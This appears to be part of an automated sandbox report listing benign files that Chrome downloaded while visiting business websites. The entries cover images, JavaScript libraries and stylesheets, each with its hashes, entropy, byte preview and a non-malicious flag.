                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...OI.k_..........4*m5,oSI.h[./.....8.rQM.OJ.2%k...-+lWJ..x.u.3)qLE.YN.5..j^.RL.PK.:'r:0|WC.'.....01s4..GN....2)aRE.IF}<%hDB._S.cX....t.7*y.Z.@.....)#Z...GN.............(..<}^E.!(p...QF..].|p......%(f40g.v.*.....{p.%0yFE.G$u...:..;x.0Xt.}.6..:..5....@2y.^..q..]l....O^..h....(Q....,..cZ.&B........z.a.G*h...jI.TKt6....B{....F...Ba....%.8)I..2`OVH.vm.W4vg...W....Y{.tgp.oS.57........r.......#..%...D...a...3.....[.....i...[....IDATh...S.....V.R.A.&)I..1i.......Y.-,m......8 .#....WP......wn..#.......M...sn..].p....k......?J(..~wWC.......z...v..0.d..?-......n%..z..a..}..[_...W`.\......._..............p....~..=..!...,..'.'#.`../.i...'..,-.....%4.1..H.v%.S.f.t../-...u...G. ......aI.<(J..'.OL.QK...../I....OnaT..(.3o...$&.#c.c.E.'a..K..K0Y.)Z:Ix..%.t.C..d?L..N$r......n.F.L........S...H.fa..Nx...$~....&w%..IE..Q...d.+.?......M.n..g2....;.Opk.d..B~a...#..t.A...!5.h.F..P..<.Ov%...`$....x..u0<.......-..(9(.M..X....n.d..p....$
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5431
                                              Entropy (8bit):7.885300755099399
                                              Encrypted:false
                                              SSDEEP:96:2KnV51VhRN2XcWubQv1yP57mPBpO9jxwgkzznTKtihRU1KVmNzxL:Z5jngXqy1y5mZA9rkzKtL1+mJxL
                                              MD5:4A4D662527FD7371F118067056863436
                                              SHA1:49ADFA9AD8C45768428FC4BB96D2CB352D2A46DF
                                              SHA-256:4FED6CFA3875C183042C6A7EF35E681FA58ACB9A765C3A652AD1C5EE2886B7D3
                                              SHA-512:14B45DA26FD7137712A8DBF3B5E5BAF8D52152C4FFD8F3C0415F83A1A2350F4321307337F98A513714B7FA2439B26E5141F061B7D4410838D0F22FCE16360928
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/2.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:70AA7084FC3311ECA65CA117B0A14322" xmpMM:InstanceID="xmp.iid:70AA7083FC3311ECA65CA117B0A14322" xmp:CreatorTool="Adobe Photoshop 23.4 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A260C674F94611EC8F2ACA399A1C8BAB" stRef:documentID="xmp.did:A260C675F94611EC8F2ACA399A1C8BAB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.\.....IDATx..\y...y..>ffwvW..@."!..]1.$v.. ..NL.......E...."'..$.L.1eQ.!.........1q...ua...:,$.....t....3..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):30734
                                              Entropy (8bit):7.992755812557774
                                              Encrypted:true
                                              SSDEEP:768:IvIeMVZJIohs5TXfPZ1sLjPxAvXq99Z7GNqyoyYlvVJvTjxOT:yost1s/ZAyr7e7oywfxOT
                                              MD5:40DC9F5FD69BCB0BC66D08EA9F49403D
                                              SHA1:6725019A2C27F3D53DBCE6021153EAD92A171BFA
                                              SHA-256:8C66BDD1EAEA647F98F67B3CCF15B95327389C0CCCE9215D09850994154E615D
                                              SHA-512:3812142ECF4DC72D35CBC0561248566FA213835A687345C69114ED6A3753F17D357CC4210DF496ED7F8875FA30BB75AC18605CB4FE0B69A3184107365163BA00
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/business-partner.webp
                                              Preview:RIFF.x..WEBPVP8X..............VP8 .w..p....*.......%..l..].........w.i.w.}X.o...?..o........n....?.g._....S..........].-.K.G.?..........................e.....O.........b.7.G.w.w.O.......Q.....W.......>.......9...+.../._.O..................'.w.../k....}@7#......_.?..a.W..._.?.........w..........j...........?w?..c.g...?..............O............O./ M....?.w..@.......?.....k...o......?........9.......?...>..y...;.........W......._......i.......?..................=.....O._........;.........>..n.....U..~f~......V...>..R.....-.v/f.b....-o.!.L.....3.b......WW.......#.L.9..h./-...F.f.J_..>.}."1.2"..M..='.......CX...}.9..(...Tl.H.h>;.W......_...}^.!.......0U.C.F.CL.,e....M...ik...:..S....~......p...d..Z..:M..3`g..).%d.......fW..,?`G....d.!..-...*.ge.LK.H.-.......2.f.=[.h8m...Z.D....Sh.d...~..v.(R...3CWH..i..x.O6.......N".m.g.+..o..d..7..?....S....q.s..(..l....P..........Op.v......X_.............RW..............".}He J.j.g...9}...7.R.....K..&.\..~.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):1389
                                              Entropy (8bit):7.8244372212417135
                                              Encrypted:false
                                              SSDEEP:24:XENh/toU+j9eFw/zXEE60/xj1QPPKbiXcT2DjhJoqUJ9kWNwkkaAaMD:XEb+kGz0E60HEPK2DjhaJaK2aMD
                                              MD5:3B0FBA1B1226A56579BB2DFECCCF4323
                                              SHA1:E0A33BE078833D4D40165C634FD4AEA896757593
                                              SHA-256:50A6ECD1929B19BC6EBFF042AC8945DC437A3A05F4BE3D23F3EDD63ADEDE1540
                                              SHA-512:99944DA82E9F294ABBBA56F8D36CC3A88234F5687C29F48B460365A53126DE586057A671D51720CC1CD5937C347C420D09DE92FA8F12FCCAB026C2A0B8EF2701
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...EPLTEW....P..Q........&d....+g......h..1m...............~..E..%`....h..C;L.....IDATh....(..UD.........j.{....i..v....."X....];n..NH.x.'..W.+..;\..<.......<..D.oE=Qx..m.K.C..n.....%....l7.fa..\Nx.....a.[Q.....M..\.."...Zp...R.`v...A.&.y..RE!'M:+%.........P...&....>..P..@>..W.l...:.]:cF.2..nk..1<.3f.@._C...m[.R.1pr..*V5.-%<.bZ.]..!...u..L..f..hB....d.-.m.O.... F....V....O.8v..._.eW.4.Q.B}.g=a.=).....#..X.h..Fo.......1......r}.5Q.1.s#...0...&...K.a..>D=.b.....r............VR......y0.F<..p..' T;D ........&.7....d{.2.~a..8x2...!"B...p...'....Oy...=.I...'...<).....?|...W.&r..B"2..[?......*.....~..v.W.&{.8.........BTS.....{...+...t..t&3.Gt.P........Q..5..i....u<.,....X.d$H..\...&...+.."h.B..Zs.' <..i.&..4...t.;....i.A...@...d.......CJ....'!H..;.;O.t.........UaM..F"dH.A.m:C.. ..u..c.d#.#.Y4..OyR..-......{?9bW...@G. .N{D.].n.I.0....>Z.Td....]Z..t2.^..2....... ..9,.....h.!..j.uH8.AG.&U.+..!....\f....]......-2
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (32019)
                                              Category:downloaded
                                              Size (bytes):35445
                                              Entropy (8bit):5.082186391611322
                                              Encrypted:false
                                              SSDEEP:768:LAyxsGKyc1gfflZVP4eAnmc6FumKSshD6cD6GLQfq9SvDz2A1Fxt:rxVKDSfJP4Nnmc6FuCshD6cD6xS9ODzV
                                              MD5:2AFCFF647ED260006FAA71C8E779E8D4
                                              SHA1:C4E5994F24EE8C8D2CF2D6602F0B56B9096A2E98
                                              SHA-256:081AE9BAAACC857C1C2CB51DE6DBD0E1EB811C2761EF01A50DF373F2F6EEFE22
                                              SHA-512:66AD813B1CA1BE74455EED3E584EA88E964B394DA3767A9BACCD61995746CF27826B50E03375F943803F22CF710352246D478377BEF9E5D34D23F3F349FD8F7B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/isotope.pkgd.min.js
                                              Preview:/*!. * Isotope PACKAGED v3.0.6. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * https://isotope.metafizzy.co. * Copyright 2010-2018 Metafizzy. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){function u(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(!h)return void r(i+" not initialized. Cannot call methods, i.e. "+s);var d=h[e];if(!d||"_"==e.charAt(0))return void r(s+" is not a valid method");var l=d.apply(h,o);n=void 0===n?l:n}),void 0!==n?n:t}function h(t,e){t.each(function(t,o){var n=a.data(o,i);n?(n.option(e),n._init()):(n=new s(o,e),a.data(o,i,n))})}a=a||e||t.jQuery,a&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.optio
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):83836
                                              Entropy (8bit):7.997290805659413
                                              Encrypted:true
                                              SSDEEP:1536:ogm0K6KgxAKO1BqJTMxX0qBz6dHFqdEVCQfxV6onxIup+dOYGYbz0VqXIudPK:oNqKgx/BM+gWlOXQfzFodnz7XIudS
                                              MD5:5E9DF5C6B4B5E19BA894605F2999AC96
                                              SHA1:D82FD5225004FF56D5A0FBD748F94122D6C1C5D2
                                              SHA-256:5ED8A37A5FD400417AC7B0FE2EBB11AF28553E9D4C795A711FED95F921736B3C
                                              SHA-512:E0CBF108224847EA788E08755BB242E43CD9231B80644AEB98A5813DEED566A9EBF0F53A337E338B610D76389083F0AD0A80E4BF8B044BE265BFE02D7ABEBED4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webp
                                              Preview:RIFFtG..WEBPVP8X..............VP8 .G..PZ...*....>.l.Q.%...v.s...bn..;i... ...5.....7yq..EE...........s...<.s.........{....z.....f.g...|...)O{.y.#......a....}N.................y...:...(.....!...9.....c...>........=....?...............e...W....V...................w...........<....q....Q.....u.......=..,...N..#>:.84U.x ...L.'.G5.....IE.(.@..G.9..lCb)...j.FXE.....o.ft.`.`.H5.....-Mn..&.9s...[5.C..i...G.J..;...s'h...k....'.) .....94..IF46......Z.d.......c>.u.%...Q...].V......!.s......C..X@.B...'.>i.[U..d.'7..._..iU.-.C.U..&.q.6&u.\..:..N.b=L3<..b...2...(...`90...Fi.6n.j.."M..=.u.Oz.rcLK...4..Y...I2o..e.!.;.F\...{7n.\..."A.{-L^..ts...X.:eR..b.2...F..8.........I....B.4&..R;)....n?r........m.` ..Dy..q.'[w..l....|.a..l~)_R...V..S.....ot.Wf.....1..,..m....F..V..Kd.._._qb.8..7......q..../|..PR....|..c...9......:.A...u.........k....7.>o.W. .?.."..MK.#..E.E....^.]..V.T.XY.H*.......*8`b..\>.%r........D$.b.:..BC^...50A.n.Cz..d.........,.l..95......"md...{...k.....F.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):29
                                              Entropy (8bit):4.142295219190901
                                              Encrypted:false
                                              SSDEEP:3:lZOwFQvn:lQw6n
                                              MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                              SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                              SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                              SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://static.doubleclick.net/instream/ad_status.js
                                              Preview:window.google_ad_status = 1;.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1280x600, components 3
                                              Category:downloaded
                                              Size (bytes):44333
                                              Entropy (8bit):7.204157271870355
                                              Encrypted:false
                                              SSDEEP:768:vwOEkMY3xuohdQD6acfBZvTSn0w3pTySjObPdnHbXG8k7cCDq:vJXhJ7u61pZvTSnSSjOhH7G8ye
                                              MD5:1DEB0CD2A0170E08F7F5F2C251BF6C97
                                              SHA1:3635F1D8C940D6FECF55FC5856ECC364ED8FB5F8
                                              SHA-256:A641646A0356D7932B572CBA159C838D53BA93FB49BB2340B6BEB823515DEDC4
                                              SHA-512:86EF56E098CFCE9A640496A47DAE6619F592A7DA7FE7FB38BAEA7D7B213BA97536FAC897CC48F64F181110E0A269F54FA657500502E5418227B32426219AD538
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/11/a8f19a8ddc204498fd4867850bfee67c.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:9ECCFE5F935111ED9BC3D7E09324EC22" xmpMM:DocumentID="xmp.did:9ECCFE60935111ED9BC3D7E09324EC22"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9ECCFE5D935111ED9BC3D7E09324EC22" stRef:documentID="xmp.did:9ECCFE5E935111ED9BC3D7E09324EC22"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................>...p"...+................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 300 x 300, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6626
                                              Entropy (8bit):7.845270033924381
                                              Encrypted:false
                                              SSDEEP:192:vO3E6dn4Xw6ynQGEnCgGvIYjFQAIJf/ic+okQz+kv:vaR4GdEnIIYjFQf5ac+okQD
                                              MD5:EE0261D9C9B8F73D47BB7626981D19F1
                                              SHA1:7AE8A013F17F4215E734A94CABF920CC274E608E
                                              SHA-256:305ECA09465003986701027861E1C0A218F7C0C68FCAEC71DCA9B5D2961D8CD3
                                              SHA-512:2310DF3747F634C2A90E20574B9F0B5D58AB3717459DE8AF27A91D324A9322A5D0E6EC8AD153FB41F0E881542C39864632D54036365EE6A1E2ACE31DF74A31BA
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...,...,.....N.~G....PLTEGpL........................................................................................................................................................................................................................................................................................................&..-..4xt9kh>a_AZXCUTEPOFNNGMMGONGSREWVD_]Bgd?so<.}6..0..(.. ................1ca@LLIGIJFFJGGJIIJTSEzv9....."...DEKJJJJJIlj=..".........FGJKKI\[C~z7..'......XWD.{7..$.....5.."..!........*]\B..-........2...RQF..$...zw8.....%......ec@`^B.....).....5qm<..... ol=..)..$...|x8nk=...hf?rn<..,..(.."...........+........+EFK.....)..3..1..3.|6ur:..*..'.....#.|6..#...ZXD..!yu9........b`A.....0...[ZC...QPF.......~6..'..-...........ws:.. ...IJJKJIMLG......................4......tRNS...'Hk.........6f......5..Q.....O...M+|..:...=..-..z.J......g..".0...8.?...................................................U.........................................n................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):131014
                                              Entropy (8bit):7.996066332495151
                                              Encrypted:true
                                              SSDEEP:3072:PN3PWpoX5t7Gn+jMBpWpCpnaZYhbly/u9YbT3T5LHGzyZxRJ7i:PVW6tan+Up7aCJweYr5HgC3J7
                                              MD5:D52B7315AD4725D876B72F30BB4038AA
                                              SHA1:E7B2572991BFACC116E1E9702938C028EBB6D261
                                              SHA-256:343E137A868ACB51BBD16EA1DD2252D8FE33B31A80C17457AFC30CD9373C596E
                                              SHA-512:A504584A5AFC8146C5AEF48F3E45BB60E56D68BDC9B614F74C6BAB7657555D325B3B6D47B4CAF46E5984658880A5659009F435237E036E0BEC6706525BB06273
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X........?.....ALPH......0......@.$%+."..zB/...........]....GT..01...we..H..2.zf.".?............r..@t?.'."....o.....w.5.K..G;........!Q."..u(.j..1..2..CuP.!......v'..u'...N...6.(.....;u.o.o.o...,Q...U.xZ.7.P.u:.....N..`.ru.^])....'.......................b./..i........C..N.*..C....J....-.-p..7..t..q.sx.P....^..e.*.\.[?...c$.....&.Z....Lg..\g..y.(..:S.((.*.u.fCT!..ihV%..J.*.U....uh.+x*.Bc.....C...\...L.:6....Q.R"..qtn^..y}.......E.>..>...u..[m..s...kC......m(.........(.1..B.$..I^.2.6]84)..h........3.l.H.\..tH<.y.M.....&....L.*.....|.....B....t...:..:Y5...;........t@6.1..:..D.2....m,..P(..e:TFl.!4...7F.E:.Ya..M'V..`..p*p..@Q.M.*+......A.....H.{K..$..PR*.P>...p.P...5T..*UP.b...j'.V.;..2;...v8..vx.Uvl.!4.b ..[.zE....i$. l#...5R..W.k..2$...ko#r.d.Xb...+..%...O.<....jmb......M..D.. ..,.F...]......C..!....+... ?........Ld.m..d......${....d..!...W....E(..}...............-.....O..>.........>................VP8 .........*@...>Q&.F#.!...p..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7556
                                              Entropy (8bit):7.912095943638799
                                              Encrypted:false
                                              SSDEEP:192:ZIIHUCD4waob8SMjMtIzb3u1JiA6sb/0h:f0wf4RMK/e1l6sb/E
                                              MD5:08C966368EADA90C8DEEFCBEABAA5D23
                                              SHA1:295C4A3883F66DCCC02651842F9D36986BDE6FC4
                                              SHA-256:1EC217430F5A609AE9E3E54F1C4CF66F0378E890586F41D20B290032F3E38E0B
                                              SHA-512:5CA7235AE3E4F761F6F2D326D7A978BBD21597BAE3CF2984131739D3A03EE424666949A0800691ECBD9AB3DEFA4F454BE5240A5AF086ECBBBC657DD47313A47B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/goaerials.png
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (554)
                                              Category:downloaded
                                              Size (bytes):184994
                                              Entropy (8bit):5.631569490379207
                                              Encrypted:false
                                              SSDEEP:3072:YxTjNm8H2AO+yNwbuQjTgkK6Drm545DtsdayPnR5t1P2/6FzgAEY7N3D0OTFOu/b:YxTPWAO+yNwSQngkKWy545ydaqnR5tlJ
                                              MD5:09E687964AECC32424F69065C6E09E01
                                              SHA1:B8D3F468CA1EB45F21FC919564FAD50089B072AE
                                              SHA-256:A55663C398778C3399E0BCB628DE29B8C4040611F00E8F996A7FEBF0CA0B3F84
                                              SHA-512:BA389AB20D835938602484CB87B6D57A0D73271FA54DE81E57781524B6847BA06B88E0DE492CAF72E5035D6D8A1105F58D3EF85392B13DE53CC5DE1B1B6ADDD8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/util.js
                                              Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Zya,aza,cza,dza,eza,fza,hza,OC,QC,RC,jza,lza,UC,nza,VC,pza,WC,rza,qza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,$C,Nza,bD,Oza,Pza,Qza,Rza,Sza,Tza,Uza,Vza,Wza,Xza,Yza,$za,bAa,dAa,fAa,hAa,jAa,lAa,nAa,pAa,rAa,sAa,tAa,uAa,vAa,wAa,xAa,yAa,cD,zAa,AAa,BAa,CAa,DAa,EAa,GAa,eD,fD,HAa,IAa,JAa,KAa,LAa,MAa,NAa,OAa,PAa,QAa,RAa,gD,SAa,hD,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,iD,$Aa,jD,aBa,bBa,cBa,dBa,eBa,fBa,gBa,hBa,iBa,jBa,kBa,lBa,mBa,nBa,oBa,pBa,qBa,rBa,sBa,uBa,vBa,wBa,yBa,lD,zBa,ABa,.BBa,CBa,DBa,EBa,GBa,JBa,KBa,MBa,PBa,QBa,RBa,ED,FD,GD,TBa,ID,JD,KD,LD,ND,VBa,OD,WBa,XBa,YBa,PD,QD,RD,SD,TD,ZBa,$Ba,aCa,cCa,dCa,UD,eCa,bCa,hCa,iCa,$D,mCa,qCa,rCa,sCa,cE,tCa,vCa,wCa,xCa,yCa,fE,ACa,FCa,oE,ICa,HCa,qE,JCa,sE,LCa,MCa,NCa,PCa,QCa,RE,SCa,SE,TCa,UCa,VCa,WCa,UE,YCa,XCa,ZCa,aDa,cDa,eDa,iDa,gDa,jDa,hDa,VE,WE,mDa,nDa,XE,YE,ZE,aF,bF,cF,pDa,eF,fF,qDa,gF,rDa,hF,iF,sDa,jF,kF,tDa,lF,zD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):10391
                                              Entropy (8bit):7.423996702010412
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwpKRWANKzn2QRbqAUo7IOOvU/a5Lq1cI:4YNg7pKQANKzn2fbo7875e1cI
                                              MD5:78CD32FF42D447D0715DF95E70FCA8D4
                                              SHA1:641DD3EEDCE8505F026E59B00AF0577537498BC3
                                              SHA-256:0037C60C906F72BE914CA4EA16FDFBFDE0A08754CA24BC65208CD0D08A6B14FD
                                              SHA-512:909FA74AA2D5D397B1EFA1BFBAC6A16B9AADA2BC6E79F63591AAF2352AB26954355B3763A016FA33E5FD805037E68E611273C6DB03CC3D01AA2D0B10F37A5FAC
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3697
                                              Entropy (8bit):7.916772166546737
                                              Encrypted:false
                                              SSDEEP:96:AHauHDnBpj6MWV1LeselTmsRLrAY7AZJ+Em9Y1:szHT6MkhedRXRwmAf+EmK1
                                              MD5:62F44CDC85F74A8C1473B3B522B7B358
                                              SHA1:C0AED0F3C4F5F8A7785938FBA89DACF5B5E4BA23
                                              SHA-256:3E19C336ED91C01777E25CBBFE85216567FA4D3D0FBDC056280C28E1E1E002F1
                                              SHA-512:C37F4479E27234B2AD76144585EB3CEB76388721901C57DC27A9715B648AB31D976B0DF0E2B10A2422421811357C648F423413DB13D6C2D0696AA08420B05CFF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/10.png
                                              Preview:.PNG........IHDR.......P.....9.......PLTE.................................................................................................................................UO.........7...8.1Q.+...j.%........PJ.@./H.-c.'f.&..................# .0,.Y.)m.$u."y.!......62.......D?....#.6s.#...............E..U.*].(.......x................@;.:6.DDD).54.2K.,....}....{s.........._X.................|.JD.+(.......pppWWW;;:...QM.GC....&$..........vm...............zp...........N.,}. ......;9.WR.]W........../,.......(%...f^.c[.........zzz^^^\\\0.3...c].sk..........c].FB....[U....WP...................eee`.'!! ...'&.53.A>.KG.......vn.ng.........................ia.....................RRRLLL000.../..kd.ri....me...............ttt<.0......JE.......pg.......lll.{@-.3D@.......?;..v. .......xs5+++...srjTR<tn,a.#...;...'tRNS..`..9...1#....g...v@..J...U+...o...........IDATh...gPTW...K.Q.F.{....e;.C.K...A...*]@.A....k.5....{.....d.s.2...=.......K......*/m,.d3)......J63~.......r..../..j..To....X.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4894
                                              Entropy (8bit):7.93798603008835
                                              Encrypted:false
                                              SSDEEP:96:3Tpsj4Tj/4ArKX37fYmsaLQY1Q/4PadKfjnyzqNBw9im3GMaH:SMf/4Oarfbs+XOdKrf1MaH
                                              MD5:DC02610316D979849714B1D6875F6CA2
                                              SHA1:C4971481DDFFCDFDA2B63066B6525CA3225F5EC9
                                              SHA-256:1C87B43736645D2DA785BBD22A0383CBC0EE4CE147A76DA927017836C417EE94
                                              SHA-512:2B5DF5B1E540E83F0F18E6C1DC7B752E5C49267B52F528E9FE70104EC6D8AD62BFCD80F7E2FEDAC36CB602B745282D189E017B858CD01664ADD7C5EA449C6D68
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........2V..=..........1U./T............................+P..?....5Z.................<."G....&J...c....9.4W......mQ.... ..\.......?...c.;.......V....c...5\......k*K.1M..2.......BY........@....3M.*U..=......]7Z...&K..-............48[.q......Z...l.....u..Z.....wI`.............q........g..0.]u..........y.....9b.....H...................xX.&.u......8.|D....Pg...w.......O.H\.......EZ.*S...o....nF.Q2.....5..J..S.t..?..<...kj....6g...}...:N.....IDATh...S....p.r#y.P.......D..rD1....7Zk.o.....v..m.=..lg......F..-.....7.(.3..|...F........<.$.eY...`y..,....l..%....HQ.$....6k..].Y....w&9.!.B.....u`."...,.{...........HI.I.e7.....$..Hr..+S.oe..,.b.~z.1-.._.x^.X...dr...9......b'.W........F..C%(J.`HR.....S.z.....f.l6k....x.D^.{.h{...~..2Cv.....'.2....E"...5I.XV.J0n.y.V.X..........i.i\.u..R........}....tw.... ";/r....'&&^?....X..^...|B.....X..bZF...L.<..T.0........K;..sO.]...H.t.u8Q..C..l%...#...-.:.e..5#cd2V&.]G,k.....R...~..x..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:downloaded
                                              Size (bytes):78840
                                              Entropy (8bit):6.022413301778022
                                              Encrypted:false
                                              SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIlbuhXwW4nxM:mGRFauOxLA/+IcTOjX/
                                              MD5:0CA290F7801B0434CFE66A0F300A324C
                                              SHA1:0891B431E5F2671A211DDD8F03ACF1D07792F076
                                              SHA-256:0C613DC5F9E10DFF735C7A102433381C97B89C4A26CE26C78D9FFAD1ADDDC528
                                              SHA-512:AF70C75F30B08D731042C45091681B55E398EA6E6D96189BC9935CE25584A57240C678FF44C0C0428F93BF1F6A504E0558BC63F233D66D1B9A5B477BA1EF1533
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/styles__ltr.css
